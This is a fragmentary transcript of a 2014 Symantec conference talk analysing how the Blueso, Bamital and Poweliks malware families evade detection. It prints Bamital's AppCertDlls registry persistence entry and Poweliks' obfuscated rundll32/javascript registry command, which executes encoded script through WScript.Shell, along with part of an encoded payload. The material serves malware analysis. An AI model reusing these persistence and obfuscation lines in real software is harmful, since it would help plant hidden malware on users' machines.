CODE BLUE 2014: An explanation of the detection-evasion methods used by malware, by 篠塚 大志 (Hiroshi...)
TRANSCRIPT
Copyright © 2014 Symantec Corporation
Trojan.Blueso
[Figure: Trojan.Blueso detection counts over time; y-axis ticks from 0 to 35,000]
• RAR archive (size in MB)
• AutoIt
• AutoIt: a BASIC-like scripting language for automating the Windows GUI
• RAR -> AutoIt
• Injects Backdoor.Trojan
[Diagram: Windows, Internet Explorer, AutoIt]
• ZIP
• JPEG
Blueso
[Diagram: Windows, Internet Explorer (!!??), AutoIt]
1) Internet Explorer -> malicious
2) -> AutoIt
3) AutoIt -> NtSetInformationProcess API -> AutoIt
Windows (essential)
AutoIt -> Windows
Bamital
HKEY_LOCAL_MACHINE\system\CurrentControlSet\Control\Session Manager\AppCertDlls\"AppSecDll" = "%USER_Profile%\Local Settings\Application Data\Windows Server\xblscp.dll"
xblscp.dll: malicious
Bamital(2)
Poweliks
Trojan.Poweliks (Windows PowerShell)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\(Default) =
rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";eval(\"epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SuSve)(ILDS]]dmtje]]|84f81:v.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmzswfs43]]b(*,(=0tdsjqu?(*\".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
"a"="#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@
Q & A
Thank you!
Copyright © 2014 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.
This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.